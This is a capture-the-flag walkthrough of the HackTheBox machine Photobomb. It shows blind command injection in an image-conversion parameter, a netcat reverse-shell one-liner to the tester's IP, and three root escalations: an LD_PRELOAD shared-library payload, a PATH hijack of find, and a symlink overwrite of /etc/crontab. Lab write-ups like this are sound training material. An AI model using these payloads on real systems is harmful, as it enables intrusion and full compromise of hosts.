Photobomb from HackTheBox was an easy machine that involved finding credentials from a javascript file, giving access to a page which generates an image file, the POST parameter responsible for file extension was vulnerable to blind command injection, giving a shell as wizard user, escalation to root was straight forward and could be done in many ways. one being abusing PATH variable as find command was not being used with it’s absolute path
NMAP
Nmap scan report for 10.10.11.182
Host is up (0.093s latency).
Not shown: 54171 closed tcp ports (conn-refused), 11362 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
| 256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_ 256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelPORT 80 (HTTP)
Visiting the web server, it’s going to redirect us to photobomb.htb so we need to add it in hosts file
It shows a link which takes us to /printer that asks for credentials
We can find the credentials by checking the source of the site which shows a js file having the credentials
With this, we can access the printer page
What this page does it converts the image into either png or jpg into the specified dimensions displayed on the site
If we remove any of the POST parameter when downloading the file, it’s going to show a stack error revealing that it’s using ruby sinatra server
Foothold
We can see from the stack error that the filetype parameter is being checked if it contains either png or jpeg, so we can try command injection there, I tried appending the id command with ; but it didn't returned any output
So I tried making a curl request to my python server which was successful
Using openbsd nc’s reverse shell payload by making it url encoded
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.72 2222 >/tmp/fStabilizing the shell with python3
Privilege Escalation (root)
Running sudo -l shows that we can run cleanup.sh as a root user
Method 1
From the output of sudo -l, we can see this is allowing us to set environment variables due to SETENV enabled, which means we can set LD_PRELOAD path which contains the path to the shared library that will be loaded before anything else, so we can abuse this by compiling this program into a shared library which will set bash a SUID and will spawn it with bash -p giving us a root shell
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>void _init() {
unsetenv("LD_PRELOAD");
setresuid(0,0,0);
system("/bin/bash -p");
}gcc -fPIC -shared -nostartfiles -o ./load.so ./test.csudo LD_PRELOAD=/tmp/load.so /opt/cleanup.shMethod 2
Checking the script which we can run
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
This script is switching to /home/wizard/photobomb, where with -s it checks if photobomb.log exists and is empty, with -L and ! it checks if the logfile isn't a symlink to avoid symlinking and then overwrites the content of photobomb.log to photobomb.log and clears out the the contents of the log file, then with find it look for all jpg files and makes root the owner of those images
Now here find isn't being ran through it's absolute path which means that we can abuse it by making a file which will spawn bash for us by setting environment variables through which we can achieve PATH variable exploit
sudo PATH=/tmp:$PATH /opt/cleanup.shMethod 3
Going back to the script, the if condition checks for photobomb.log but not photobomb.log.old so we can symlink the old log file with /etc/crontab and include the crontab in the original log file which will basically overwrite the crontab file, therefore symlinking the file with crontab
ln -sf /etc/crontab photobomb.log.oldNow place a bash script which will make bash a SUID or you can place a reverse shell there
#!/bin/bash
chmod +s /bin/bash* * * * * root /tmp/shell.shPutting the crontab in photobomb.log file which will overwrite the old log file which will then overwrite the crontab file, making bash a SUID and then we can spawn bash with -p to execute it as the SUID owner which is root
